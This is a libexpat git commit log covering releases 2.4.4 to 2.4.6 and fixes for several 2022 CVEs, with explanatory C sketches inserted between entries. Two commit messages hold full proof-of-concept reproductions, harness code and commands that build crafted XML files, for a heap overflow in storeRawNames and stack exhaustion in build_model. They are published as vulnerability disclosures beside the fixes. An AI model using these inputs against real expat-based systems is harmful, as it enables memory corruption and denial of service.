Commit message  Author  Age  Files  Lines
* Changes: Document loop replacement [deloop]  Sebastian Pipping  2022-02-20  1  -0/+4
|
* lib: Leverage strcmp/wcscmp  Sebastian Pipping  2022-02-20  1  -0/+8
|
* lib: Leverage memcpy (and xcslen)  Sebastian Pipping  2022-02-20  1  -6/+3
|
* lib: Leverage poolAppendChars (and xcslen)  Sebastian Pipping  2022-02-20  1  -79/+55
|
* lib/xmlwf: Leverage xcslen  Sebastian Pipping  2022-02-20  3  -38/+27
|
* lib: Add a multi-char version of poolAppendChar based on memcpy  Sebastian Pipping  2022-02-20  1  -0/+19
|
* lib: Add string length function xcslen for static re-use  Sebastian Pipping  2022-02-20  3  -0/+50
|
* lib: Leverage (existing single-char) poolAppendChar  Sebastian Pipping  2022-02-20  1  -4/+2
|
* Merge pull request #568 from libexpat/issue-567-prepare-release [R_2_4_6]  Sebastian Pipping  2022-02-20  11  -18/+22
|\
| |   Prepare release 2.4.6 (part of #567)
| * Set expected release date for 2.4.6  Sebastian Pipping  2022-02-20  2  -2/+2
| |
| * Bump version to 2.4.6  Sebastian Pipping  2022-02-20  8  -13/+13
| |
| * Bump version info from 9:5:8 to 9:6:8  Sebastian Pipping  2022-02-20  3  -2/+6
| |   See https://verbump.de/ for what these numbers do
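As a rough illustration of what a version info triple such as 9:6:8 encodes: libtool reads it as current:revision:age, and on Linux the shared-object suffix is commonly derived as (current - age).age.revision. The helper and struct below are hypothetical names made up for this sketch; they are not part of expat or libtool.

```c
#include <assert.h>

/* Hypothetical result type: the three numbers of a Linux-style
   shared-object suffix such as libfoo.so.MAJOR.MINOR.PATCH. */
typedef struct {
  int major;
  int minor;
  int patch;
} SoVersion;

/* Map a libtool current:revision:age triple to the suffix that libtool
   commonly produces on Linux: (current - age).age.revision. */
static SoVersion libtool_to_linux_soversion(int current, int revision, int age) {
  assert(age >= 0 && revision >= 0 && current >= age);
  SoVersion v = {current - age, age, revision};
  return v;
}
```

Under that assumption, the bump from 9:5:8 to 9:6:8 changes only the last component of the suffix, which matches a release that leaves the interface untouched.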
| * Changes: Finalize entry on #566  Sebastian Pipping  2022-02-20  1  -1/+1
|/
* Merge pull request #566 from ferivoz/model-regression  Sebastian Pipping  2022-02-20  3  -32/+140
|\
| |   Fix build_model regression
| * Changes: Document regression from CVE-2022-25313 fix  Sebastian Pipping  2022-02-20  1  -0/+16
| |
| * tests: Protect against nested element declaration model regressions  Sebastian Pipping  2022-02-20  1  -0/+77
| |
| * Fix build_model regression.  Samanta Navarro  2022-02-20  1  -32/+47
|/
|   The iterative approach in build_model failed to fill children arrays
|   correctly. A preorder traversal is not required and turned out to be the
|   culprit.
|
|   Use an easier algorithm:
|   Add nodes from scaffold tree starting at index 0 (root) to the target
|   array whenever children are encountered. This ensures that children are
|   adjacent to each other. This complies with the recursive version.
|
|   Store only the scaffold index in numchildren field to prevent a direct
|   processing of these children, which would require a recursive solution.
|   This allows the algorithm to iterate through the target array from start
|   to end without jumping back and forth, converting on the fly.
|
|   Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
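The algorithm described in this commit message can be sketched roughly as follows. This is a simplified illustration, not expat's actual build_model: the types ScaffoldNode and Node, their fields, and the function build_flat are hypothetical stand-ins. It walks the target array once from start to end, appends each node's children as one adjacent block, and parks the scaffold index in numchildren until the node itself is converted.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified stand-in for a scaffold tree entry. */
typedef struct {
  int firstchild; /* scaffold index of the first child, or -1 */
  int nextsib;    /* scaffold index of the next sibling, or -1 */
  int childcnt;   /* number of children */
  int label;      /* illustrative payload */
} ScaffoldNode;

/* Hypothetical, simplified stand-in for a node of the target array. */
typedef struct Node {
  int label;
  unsigned int numchildren; /* temporarily holds a scaffold index */
  struct Node *children;    /* points into the same flat array */
} Node;

/* Fill `out` (one slot per scaffold node) without recursion. */
static void build_flat(const ScaffoldNode *scaffold, Node *out) {
  Node *next_free = out + 1; /* slot 0 is reserved for the root */
  out[0].numchildren = 0;    /* scaffold index of the root */

  /* Single forward pass: every slot before next_free is pending or done. */
  for (Node *dest = out; dest < next_free; dest++) {
    const ScaffoldNode *src = &scaffold[dest->numchildren];
    dest->label = src->label;
    dest->numchildren = (unsigned int)src->childcnt;
    dest->children = src->childcnt > 0 ? next_free : NULL;

    /* Append all children as one adjacent block; store only their
       scaffold index so they get converted when the loop reaches them. */
    int child = src->firstchild;
    for (int i = 0; i < src->childcnt; i++) {
      assert(child >= 0); /* scaffold must be consistent */
      next_free->numchildren = (unsigned int)child;
      next_free++;
      child = scaffold[child].nextsib;
    }
  }
}
```

Because children are only appended and never revisited out of order, the loop needs no stack and no backtracking.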
* Merge pull request #564 from libexpat/issue-557-prepare-release [R_2_4_5]  Sebastian Pipping  2022-02-18  14  -20/+40
|\
| |   Prepare release 2.4.5 (part of #557)
| * Set expected release date for 2.4.5  Sebastian Pipping  2022-02-18  2  -2/+2
| |
| * Sync file headers  Sebastian Pipping  2022-02-18  3  -3/+3
| |
| * Bump version to 2.4.5  Sebastian Pipping  2022-02-18  8  -13/+13
| |
| * Bump version info from 9:4:8 to 9:5:8  Sebastian Pipping  2022-02-18  3  -2/+6
| |   See https://verbump.de/ for what these numbers do
| * Changes: Document #558 #559 #560  Sebastian Pipping  2022-02-18  1  -0/+16
|/
* Merge pull request #562 from libexpat/utf8-security  Sebastian Pipping  2022-02-18  4  -12/+127
|\
| |   [CVE-2022-25235] lib: Protect against malformed encoding (e.g. malformed UTF-8)
| * Changes: Document CVE-2022-25235  Sebastian Pipping  2022-02-18  1  -0/+7
| |
| * tests: Cover missing validation of encoding (CVE-2022-25235)  Sebastian Pipping  2022-02-18  1  -0/+109
| |
| * lib: Add comments to BT_LEAD* cases where encoding has already been validated  Sebastian Pipping  2022-02-18  1  -5/+5
| |
| * lib: Add missing validation of encoding (CVE-2022-25235)  Sebastian Pipping  2022-02-18  1  -2/+6
| |
| * lib: Drop unused macro UTF8_GET_NAMING  Sebastian Pipping  2022-02-18  1  -5/+0
|/
* Merge pull request #561 from libexpat/namesep-security  Sebastian Pipping  2022-02-18  3  -4/+59
|\
| |   [CVE-2022-25236] lib: Protect against insertion of namesep characters into namespace URIs
| * Changes: Document CVE-2022-25236  Sebastian Pipping  2022-02-16  1  -0/+16
| |
| * tests: Cover CVE-2022-25236  Sebastian Pipping  2022-02-16  1  -0/+30
| |
| * lib: Protect against malicious namespace declarations (CVE-2022-25236)  Sebastian Pipping  2022-02-16  1  -0/+11
| |
| * lib: Fix (harmless) use of uninitialized memory  Sebastian Pipping  2022-02-16  1  -4/+2
| |
* | Merge pull request #560 from ferivoz/copy  Sebastian Pipping  2022-02-18  1  -1/+1
|\ \
| | |   [CVE-2022-25314] lib: Prevent integer overflow in copyString
| * | Prevent integer overflow in copyString  Samanta Navarro  2022-02-15  1  -1/+1
| | |   The copyString function is only used for encoding string supplied by the library user.
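For readers unfamiliar with this class of bug, here is a minimal sketch of a string copy that cannot overflow while computing its allocation size. It is not expat's copyString; the type demo_char and the function copy_string_checked are hypothetical names for this illustration. The idea is to count characters in size_t rather than int and to check the multiplication before allocating.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for a character type wider than one byte. */
typedef unsigned short demo_char;

/* Duplicate a zero-terminated string. Returns NULL if the size
   computation would overflow or the allocation fails. */
static demo_char *copy_string_checked(const demo_char *s) {
  assert(s != NULL);

  /* Count in size_t so that very long inputs cannot wrap an int. */
  size_t chars = 0;
  while (s[chars] != 0)
    chars++;
  chars++; /* room for the terminator */

  /* Refuse sizes whose byte count does not fit into size_t. */
  if (chars > SIZE_MAX / sizeof(demo_char))
    return NULL;

  demo_char *result = malloc(chars * sizeof(demo_char));
  if (result == NULL)
    return NULL;
  memcpy(result, s, chars * sizeof(demo_char));
  return result;
}
```

The caller owns the returned buffer and releases it with free.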
* | | Merge pull request #559 from ferivoz/rawnames  Sebastian Pipping  2022-02-18  1  -1/+6
|\ \ \
| | | |   [CVE-2022-25315] lib: Prevent integer overflow in storeRawNames
| * | | Prevent integer overflow in storeRawNames  Samanta Navarro  2022-02-15  1  -1/+6
| |/ /
| | |   It is possible to use an integer overflow in storeRawNames for out of
| | |   boundary heap writes. Default configuration is affected. If compiled with
| | |   XML_UNICODE then the attack does not work. Compiling with
| | |   -fsanitize=address confirms the following proof of concept.
| | |
| | |   The problem can be exploited by abusing the m_buffer expansion logic.
| | |   Even though the initial size of m_buffer is a power of two, eventually
| | |   it can end up a little bit lower, thus allowing allocations very close
| | |   to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
| | |   names can be parsed which are almost INT_MAX in size.
| | |
| | |   Unfortunately (from an attacker point of view) INT_MAX/2 is also a
| | |   limitation in string pools. Having a tag name of INT_MAX/2 characters
| | |   or more is not possible.
| | |
| | |   Expat can convert between different encodings. UTF-16 documents which
| | |   contain only ASCII representable characters are twice as large as their
| | |   ASCII encoded counter-parts.
| | |
| | |   The proof of concept works by taking these three considerations into
| | |   account:
| | |
| | |   1. Move the m_buffer size slightly below a power of two by having a
| | |      short root node <a>. This allows the m_buffer to grow very close
| | |      to INT_MAX.
| | |   2. The string pooling forbids tag names longer than or equal to
| | |      INT_MAX/2, so keep the attack tag name smaller than that.
| | |   3. To be able to still overflow INT_MAX even though the name is
| | |      limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
| | |      which only contains ASCII characters. UTF-16 always stores two
| | |      bytes per character while the tag name is converted to using only
| | |      one.
| | |
| | |   Our attack node byte count must be a bit higher than 2/3 INT_MAX so
| | |   the converted tag name is around INT_MAX/3 which in sum can overflow
| | |   INT_MAX.
| | |
| | |   Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
| | |   without running into INT_MAX boundary check. The string pooling is
| | |   able to store INT_MAX/3 as tag name because the amount is below
| | |   INT_MAX/2 limitation. And creating the sum of both eventually overflows
| | |   in storeRawNames.
| | |
| | |   Proof of Concept:
| | |
| | |   1. Compile expat with -fsanitize=address.
| | |
| | |   2. Create Proof of Concept binary which iterates through input
| | |      file 16 MB at once for better performance and easier integer
| | |      calculations:
| | |
| | |   ```
| | |   cat > poc.c << EOF
| | |   #include <err.h>
| | |   #include <expat.h>
| | |   #include <stdlib.h>
| | |   #include <stdio.h>
| | |
| | |   #define CHUNK (16 * 1024 * 1024)
| | |   int main(int argc, char *argv[]) {
| | |     XML_Parser parser;
| | |     FILE *fp;
| | |     char *buf;
| | |     int i;
| | |
| | |     if (argc != 2)
| | |       errx(1, "usage: poc file.xml");
| | |     if ((parser = XML_ParserCreate(NULL)) == NULL)
| | |       errx(1, "failed to create expat parser");
| | |     if ((fp = fopen(argv[1], "r")) == NULL) {
| | |       XML_ParserFree(parser);
| | |       err(1, "failed to open file");
| | |     }
| | |     if ((buf = malloc(CHUNK)) == NULL) {
| | |       fclose(fp);
| | |       XML_ParserFree(parser);
| | |       err(1, "failed to allocate buffer");
| | |     }
| | |     i = 0;
| | |     while (fread(buf, CHUNK, 1, fp) == 1) {
| | |       printf("iteration %d: XML_Parse returns %d\n", ++i,
| | |              XML_Parse(parser, buf, CHUNK, XML_FALSE));
| | |     }
| | |     free(buf);
| | |     fclose(fp);
| | |     XML_ParserFree(parser);
| | |     return 0;
| | |   }
| | |   EOF
| | |   gcc -fsanitize=address -lexpat -o poc poc.c
| | |   ```
| | |
| | |   3. Construct specially prepared UTF-16 XML file:
| | |
| | |   ```
| | |   dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
| | |   echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
| | |   echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
| | |   iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
| | |   ```
| | |
| | |   4. Run proof of concept:
| | |
| | |   ```
| | |   ./poc poc-utf16.xml
| | |   ```
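The arithmetic behind this proof of concept can be illustrated with a small guard. This is a sketch only and not the code of storeRawNames; the function sum_fits_in_int and its parameter names are hypothetical. It tests whether adding a converted name length and a raw name length stays within INT_MAX by rearranging the comparison so that the check itself cannot overflow.

```c
#include <assert.h>
#include <limits.h>

/* Returns 1 if name_len + raw_len is representable as int, else 0.
   The subtraction form avoids computing the overflowing sum. */
static int sum_fits_in_int(int name_len, int raw_len) {
  assert(name_len >= 0 && raw_len >= 0);
  return raw_len <= INT_MAX - name_len;
}
```

With a raw name slightly above 2/3 INT_MAX bytes and a converted name around INT_MAX/3 bytes, as in the commit message, each length is individually valid but the guard reports that their sum is not.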
* | | Merge pull request #558 from ferivoz/model  Sebastian Pipping  2022-02-18  1  -37/+79
|\ \ \
| |_|/
|/| |   [CVE-2022-25313] lib: Prevent stack exhaustion in build_model
| * | Prevent stack exhaustion in build_model  Samanta Navarro  2022-02-15  1  -37/+79
| |/
| |   It is possible to trigger stack exhaustion in build_model function if
| |   depth of nested children in DTD element is large enough. This happens
| |   because build_node is a recursively called function within build_model.
| |
| |   The code has been adjusted to run iteratively. It uses the already
| |   allocated heap space as temporary stack (growing from top to bottom).
| |
| |   Output is identical to recursive version. No new fields in data
| |   structures were added, i.e. it keeps full API and ABI compatibility.
| |   Instead the numchildren variable is used to temporarily keep the index
| |   of items (uint vs int).
| |
| |   Documentation and readability improvements kindly added by Sebastian.
| |
| |   Proof of Concept:
| |
| |   1. Compile poc binary which parses XML file line by line
| |
| |   ```
| |   cat > poc.c << EOF
| |   #include <err.h>
| |   #include <expat.h>
| |   #include <stdio.h>
| |   #include <stdlib.h>
| |
| |   XML_Parser parser;
| |
| |   static void XMLCALL
| |   dummy_element_decl_handler(void *userData, const XML_Char *name,
| |                              XML_Content *model) {
| |     XML_FreeContentModel(parser, model);
| |   }
| |
| |   int main(int argc, char *argv[]) {
| |     FILE *fp;
| |     char *p = NULL;
| |     size_t s = 0;
| |     ssize_t l;
| |     if (argc != 2)
| |       errx(1, "usage: poc poc.xml");
| |     if ((parser = XML_ParserCreate(NULL)) == NULL)
| |       errx(1, "XML_ParserCreate");
| |     XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
| |     if ((fp = fopen(argv[1], "r")) == NULL)
| |       err(1, "fopen");
| |     while ((l = getline(&p, &s, fp)) > 0)
| |       if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
| |         errx(1, "XML_Parse");
| |     XML_ParserFree(parser);
| |     free(p);
| |     fclose(fp);
| |     return 0;
| |   }
| |   EOF
| |   cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
| |   ```
| |
| |   2. Create XML file with a lot of nested groups in DTD element
| |
| |   ```
| |   cat > poc.xml.zst.b64 << EOF
| |   KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
| |   ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
| |   ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
| |   EOF
| |   base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
| |   ```
| |
| |   3. Run Proof of Concept
| |
| |   ```
| |   ./poc poc.xml
| |   ```
| |
| |   Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
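To illustrate why moving from recursion to iteration removes the stack exhaustion risk, here is a minimal sketch that measures the nesting depth of a tree with an explicit heap-allocated stack. It is not the build_model code: the commit reuses already allocated heap space as its stack, whereas this sketch allocates a separate one for simplicity, and the names TreeNode, Frame and max_depth_iterative are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical tree layout: nodes live in an array and link by index. */
typedef struct {
  int firstchild; /* index of the first child, or -1 */
  int nextsib;    /* index of the next sibling, or -1 */
} TreeNode;

typedef struct {
  int node;
  int depth;
} Frame;

/* Returns the maximum depth (root counts as 1), or -1 if the explicit
   stack cannot be allocated. Node 0 is assumed to be the root. */
static int max_depth_iterative(const TreeNode *nodes, size_t count) {
  assert(nodes != NULL && count > 0);
  if (count > SIZE_MAX / sizeof(Frame))
    return -1;

  /* Each node is pushed at most once, so `count` frames always suffice. */
  Frame *stack = malloc(count * sizeof(Frame));
  if (stack == NULL)
    return -1;

  size_t top = 0;
  int best = 0;
  stack[top++] = (Frame){0, 1};
  while (top > 0) {
    Frame f = stack[--top];
    if (f.depth > best)
      best = f.depth;
    for (int c = nodes[f.node].firstchild; c != -1; c = nodes[c].nextsib)
      stack[top++] = (Frame){c, f.depth + 1};
  }
  free(stack);
  return best;
}
```

The memory needed now scales with the heap allocation rather than with the call stack, so deeply nested input leads at worst to a failed allocation that can be reported.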
* | Merge pull request #563 from libexpat/extend-mailmap  Sebastian Pipping  2022-02-15  10  -9/+10
|\ \
| |/
|/|   Extend .mailmap
| * Sync file headers  Sebastian Pipping  2022-02-15  9  -9/+9
| |
| * Extend .mailmap  Sebastian Pipping  2022-02-15  1  -0/+1
|/
* Merge pull request #554 from libexpat/issue-552-prepare-release [R_2_4_4]  Sebastian Pipping  2022-01-30  16  -22/+36
|\
| |   Prepare release 2.4.4 (part of #552)
| * win32: Add missing files to the installer  Sebastian Pipping  2022-01-29  2  -0/+7
| |
| * doc: Drop unused file valid-xhtml10.png  Sebastian Pipping  2022-01-29  3  -2/+0
| |   Unused since commit 30c4aa85f530f279d8c9cc2f584fa9a9df7e2bf1 of 2.4.0
| * .gitignore: Add missing  Sebastian Pipping  2022-01-29  2  -0/+2
| |
| * xmlwf.xml: Adapt note to current practice  Sebastian Pipping  2022-01-29  1  -1/+1
| |
| * Set expected release date for 2.4.4  Sebastian Pipping  2022-01-29  2  -2/+2
| |
| * Sync file headers  Sebastian Pipping  2022-01-29  3  -2/+3
| |